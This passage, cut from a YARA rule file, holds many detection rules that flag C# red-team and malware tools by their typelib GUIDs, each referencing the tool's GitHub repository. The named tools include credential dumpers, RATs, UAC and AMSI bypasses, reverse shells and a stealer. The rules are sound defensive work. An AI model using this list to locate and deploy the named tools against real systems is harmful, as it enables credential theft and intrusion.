strings: $typelibguid0 = "4ab3b95d-373c-4197-8ee3-fe0fa66ca122" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HastySeries { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/obscuritylabs/HastySeries" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8435531d-675c-4270-85bf-60db7653bcf6" ascii nocase wide $typelibguid1 = "47db989f-7e33-4e6b-a4a5-c392b429264b" ascii nocase wide $typelibguid2 = "300c7489-a05f-4035-8826-261fa449dd96" ascii nocase wide $typelibguid3 = "41bf8781-ae04-4d80-b38d-707584bf796b" ascii nocase wide $typelibguid4 = "620ed459-18de-4359-bfb0-6d0c4841b6f6" ascii nocase wide $typelibguid5 = "91e7cdfe-0945-45a7-9eaa-0933afe381f2" ascii nocase wide $typelibguid6 = "c28e121a-60ca-4c21-af4b-93eb237b882f" ascii nocase wide $typelibguid7 = "698fac7a-bff1-4c24-b2c3-173a6aae15bf" ascii nocase wide $typelibguid8 = "63a40d94-5318-42ad-a573-e3a1c1284c57" ascii nocase wide $typelibguid9 = "56b8311b-04b8-4e57-bb58-d62adc0d2e68" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DreamProtectorFree { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Paskowsky/DreamProtectorFree" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f7e8a902-2378-426a-bfa5-6b14c4b40aa3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RedSharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/padovah4ck/RedSharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "30b2e0cf-34dd-4614-a5ca-6578fb684aea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ESC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NetSPI/ESC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "06260ce5-61f4-4b81-ad83-7d01c3b37921" ascii nocase wide $typelibguid1 = "87fc7ede-4dae-4f00-ac77-9c40803e8248" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Csharp_Loader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Csharp-Loader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5fd7f9fc-0618-4dde-a6a0-9faefe96c8a1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_bantam { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/gellin/bantam" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "14c79bda-2ce6-424d-bd49-4f8d68630b7b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpTask { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpTask" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "13e90a4d-bf7a-4d5a-9979-8b113e3166be" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WindowsPlague { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/RITRedteam/WindowsPlague" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "cdf8b024-70c9-413a-ade3-846a43845e99" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Misc_CSharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/Misc-CSharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "d1421ba3-c60b-42a0-98f9-92ba4e653f3d" ascii nocase wide $typelibguid1 = "2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSpray { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpSpray" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "51c6e016-1428-441d-82e9-bb0eb599bbc8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Obfuscator { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/3xpl01tc0d3r/Obfuscator" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8fe5b811-a2cb-417f-af93-6a3cf6650af1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SafetyKatz { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SafetyKatz" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Dropless_Malware { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Dropless-Malware" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "23b739f7-2355-491e-a7cd-a8485d39d6d6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UAC_SilentClean { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/EncodeGroup/UAC-SilentClean" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "948152a4-a4a1-4260-a224-204255bfee72" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DesktopGrabber { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/DesktopGrabber" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "e6aa0cd5-9537-47a0-8c85-1fbe284a4380" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_wsManager { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/guillaC/wsManager" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9480809e-5472-44f3-b076-dcdf7379e766" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UglyEXe { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fashionproof/UglyEXe" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "233de44b-4ec1-475d-a7d6-16da48d6fc8d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SharpDump" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "79c9bba3-a0ea-431c-866c-77004802d8a0" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EducationalRAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/securesean/EducationalRAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8a18fbcf-8cac-482d-8ab7-08a44f0e278e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Stealth_Kid_RAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ctsecurity/Stealth-Kid-RAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "bf43cd33-c259-4711-8a0e-1a5c6c13811d" ascii nocase wide $typelibguid1 = "e5b9df9b-a9e4-4754-8731-efc4e2667d88" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCradle { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/anthemtotheego/SharpCradle" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f70d2b71-4aae-4b24-9dae-55bc819c78bb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BypassUAC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cnsimo/BypassUAC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4e7c140d-bcc4-4b15-8c11-adb4e54cc39a" ascii nocase wide $typelibguid1 = "cec553a7-1370-4bbc-9aae-b2f5dbde32b0" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_hanzoInjection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/P0cL4bs/hanzoInjection" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "32e22e25-b033-4d98-a0b3-3d2c3850f06c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_clr_meterpreter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/OJ/clr-meterpreter" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6840b249-1a0e-433b-be79-a927696ea4b3" ascii nocase wide $typelibguid1 = "67c09d37-ac18-4f15-8dd6-b5da721c0df6" ascii nocase wide $typelibguid2 = "e05d0deb-d724-4448-8c4c-53d6a8e670f3" ascii nocase wide $typelibguid3 = "c3cc72bf-62a2-4034-af66-e66da73e425d" ascii nocase wide $typelibguid4 = "7ace3762-d8e1-4969-a5a0-dcaf7b18164e" ascii nocase wide $typelibguid5 = "3296e4a3-94b5-4232-b423-44f4c7421cb3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BYTAGE { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/KNIF/BYTAGE" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8e46ba56-e877-4dec-be1e-394cb1b5b9de" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MultiOS_ReverseShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/belane/MultiOS_ReverseShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "df0dd7a1-9f6b-4b0f-801e-e17e73b0801d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HideFromAMSI { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0r13lc0ch4v1/HideFromAMSI" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "b91d2d44-794c-49b8-8a75-2fbec3fe3fe3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DotNetAVBypass_Master { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/lockfale/DotNetAVBypass-Master" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4854c8dc-82b0-4162-86e0-a5bbcbc10240" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDPAPI { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SharpDPAPI" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5f026c27-f8e6-4052-b231-8451c6a73838" ascii nocase wide $typelibguid1 = "2f00a05b-263d-4fcc-846b-da82bd684603" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Telegra_Csharp_C2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/sf197/Telegra_Csharp_C2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1d79fabc-2ba2-4604-a4b6-045027340c85" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCompile { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SpiderLabs/SharpCompile" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "63f81b73-ff18-4a36-b095-fdcb4776da4c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Carbuncle { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/checkymander/Carbuncle" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3f239b73-88ae-413b-b8c8-c01a35a0d92e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_OSSFileTool { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/B1eed/OSSFileTool" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "207aca5d-dcd6-41fb-8465-58b39efcde8b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Rubeus { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/Rubeus" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Simple_Loader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cribdragg3r/Simple-Loader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "035ae711-c0e9-41da-a9a2-6523865e8694" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Minidump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/3xpl01tc0d3r/Minidump" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "15c241aa-e73c-4b38-9489-9a344ac268a3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpBypassUAC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FatRodzianko/SharpBypassUAC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0d588c86-c680-4b0d-9aed-418f1bb94255" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpPack { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Lexus89/SharpPack" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid1 = "b59c7741-d522-4a41-bf4d-9badddebb84a" ascii nocase wide $typelibguid2 = "fd6bdf7a-fef4-4b28-9027-5bf750f08048" ascii nocase wide $typelibguid3 = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii nocase wide $typelibguid5 = "f3037587-1a3b-41f1-aa71-b026efdb2a82" ascii nocase wide $typelibguid6 = "41a90a6a-f9ed-4a2f-8448-d544ec1fd753" ascii nocase wide $typelibguid7 = "3787435b-8352-4bd8-a1c6-e5a1b73921f4" ascii nocase wide $typelibguid8 = "fdd654f5-5c54-4d93-bf8e-faf11b00e3e9" ascii nocase wide $typelibguid9 = "aec32155-d589-4150-8fe7-2900df4554c8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Salsa_tools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Hackplayers/Salsa-tools" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "276004bb-5200-4381-843c-934e4c385b66" ascii nocase wide $typelibguid1 = "cfcbf7b6-1c69-4b1f-8651-6bdb4b55f6b9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WindowsDefender_Payload_Downloader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/notkohlrexo/WindowsDefender-Payload-Downloader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2f8b4d26-7620-4e11-b296-bc46eba3adfc" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Privilege_Escalation { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Mrakovic-ORG/Privilege_Escalation" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "ed54b904-5645-4830-8e68-52fd9ecbb2eb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Marauder { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/maraudershell/Marauder" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fff0a9a3-dfd4-402b-a251-6046d765ad78" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AV_Evasion_Tool { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/1y0n/AV_Evasion_Tool" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1937ee16-57d7-4a5f-88f4-024244f19dc6" ascii nocase wide $typelibguid1 = "7898617d-08d2-4297-adfe-5edd5c1b828b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Fenrir { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nccgroup/Fenrir" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "aecec195-f143-4d02-b946-df0e1433bd2e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_StormKitty { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/LimerBoy/StormKitty" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a16abbb4-985b-4db2-a80c-21268b26c73d" ascii nocase wide $typelibguid1 = "98075331-1f86-48c8-ae29-29da39a8f98b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Crypter_Runtime_AV_s_bypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/netreverse/Crypter-Runtime-AV-s-bypass" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c25e39a9-8215-43aa-96a3-da0e9512ec18" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RunAsUser { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/atthacks/RunAsUser" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9dff282c-93b9-4063-bf8a-b6798371d35a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HWIDbypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/yunseok/HWIDbypass" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "47e08791-d124-4746-bc50-24bd1ee719a6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_XORedReflectiveDLL { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/r3nhat/XORedReflectiveDLL" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c0e49392-04e3-4abb-b931-5202e0eb4c73" ascii nocase wide $typelibguid1 = "30eef7d6-cee8-490b-829f-082041bc3141" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharp_Suite { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/Sharp-Suite" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "467ee2a9-2f01-4a71-9647-2a2d9c31e608" ascii nocase wide $typelibguid1 = "5611236e-2557-45b8-be29-5d1f074d199e" ascii nocase wide $typelibguid2 = "447edefc-b429-42bc-b3bc-63a9af19dbd6" ascii nocase wide $typelibguid3 = "eacaa2b8-43e5-4888-826d-2f6902e16546" ascii nocase wide $typelibguid4 = "a3b7c697-4bb6-455d-9fda-4ab54ae4c8d2" ascii nocase wide $typelibguid5 = "a5f883ce-1f96-4456-bb35-40229191420c" ascii nocase wide $typelibguid6 = "28978103-d90d-4618-b22e-222727f40313" ascii nocase wide $typelibguid7 = "252676f8-8a19-4664-bfb8-5a947e48c32a" ascii nocase wide $typelibguid8 = "414187db-5feb-43e5-a383-caa48b5395f1" ascii nocase wide $typelibguid9 = "0c70c839-9565-4881-8ea1-408c1ebe38ce" ascii nocase wide $typelibguid10 = "0a382d9a-897f-431a-81c2-a4e08392c587" ascii nocase wide $typelibguid11 = "629f86e6-44fe-4c9c-b043-1c9b64be6d5a" ascii nocase wide $typelibguid12 = "f0d28809-b712-4380-9a59-407b7b2badd5" ascii nocase wide $typelibguid13 = "956a5a4d-2007-4857-9259-51cd0fb5312a" ascii nocase wide $typelibguid14 = "53f622eb-0ca3-4e9b-9dc8-30c832df1c7b" ascii nocase wide $typelibguid15 = "72019dfe-608e-4ab2-a8f1-66c95c425620" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_rat_shell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/stphivos/rat-shell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "7a15f8f6-6ce2-4ca4-919d-2056b70cc76a" ascii nocase wide $typelibguid1 = "1659d65d-93a8-4bae-97d5-66d738fc6f6c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_dotnet_gargoyle { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/countercept/dotnet-gargoyle" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "76435f79-f8af-4d74-8df5-d598a551b895" ascii nocase wide $typelibguid1 = "5a3fc840-5432-4925-b5bc-abc536429cb5" ascii nocase wide $typelibguid2 = "6f0bbb2a-e200-4d76-b8fa-f93c801ac220" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_aresskit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BlackVikingPro/aresskit" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8dca0e42-f767-411d-9704-ae0ba4a44ae8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DLL_Injector { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tmthrgd/DLL-Injector" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4581a449-7d20-4c59-8da2-7fd830f1fd5e" ascii nocase wide $typelibguid1 = "05f4b238-25ce-40dc-a890-d5bbb8642ee4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TruffleSnout { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/dsnezhkov/TruffleSnout" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "33842d77-bce3-4ee8-9ee2-9769898bb429" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Anti_Analysis { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Anti-Analysis" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3092c8df-e9e4-4b75-b78e-f81a0058a635" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BackNet { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/valsov/BackNet" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9fdae122-cd1e-467d-a6fa-a98c26e76348" ascii nocase wide $typelibguid1 = "243c279e-33a6-46a1-beab-2864cc7a499f" ascii nocase wide $typelibguid2 = "a7301384-7354-47fd-a4c5-65b74e0bbb46" ascii nocase wide $typelibguid3 = "982dc5b6-1123-428a-83dd-d212490c859f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AllTheThings { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/johnjohnsp1/AllTheThings" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0547ff40-5255-42a2-beb7-2ff0dbf7d3ba" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AddReferenceDotRedTeam { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ceramicskate0/AddReferenceDotRedTeam" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "73c79d7e-17d4-46c9-be5a-ecef65b924e4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Lime_Crypter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-Crypter" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f93c99ed-28c9-48c5-bb90-dd98f18285a6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BrowserGhost { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/QAX-A-Team/BrowserGhost" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2133c634-4139-466e-8983-9a23ec99e01b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShot { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tothi/SharpShot" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "057aef75-861b-4e4b-a372-cfbd8322c8e1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Offensive__NET { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mrjamiebowman/Offensive-.NET" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "11fe5fae-b7c1-484a-b162-d5578a802c9c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RuralBishop { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/RuralBishop" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fe4414d9-1d7e-4eeb-b781-d278fe7a5619" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DeviceGuardBypasses { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tyranid/DeviceGuardBypasses" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f318466d-d310-49ad-a967-67efbba29898" ascii nocase wide $typelibguid1 = "3705800f-1424-465b-937d-586e3a622a4f" ascii nocase wide $typelibguid2 = "256607c2-4126-4272-a2fa-a1ffc0a734f0" ascii nocase wide $typelibguid3 = "4e6ceea1-f266-401c-b832-f91432d46f42" ascii nocase wide $typelibguid4 = "1e6e9b03-dd5f-4047-b386-af7a7904f884" ascii nocase wide $typelibguid5 = "d85e3601-0421-4efa-a479-f3370c0498fd" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AMSI_Handler { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/two06/AMSI_Handler" author = "Arnim 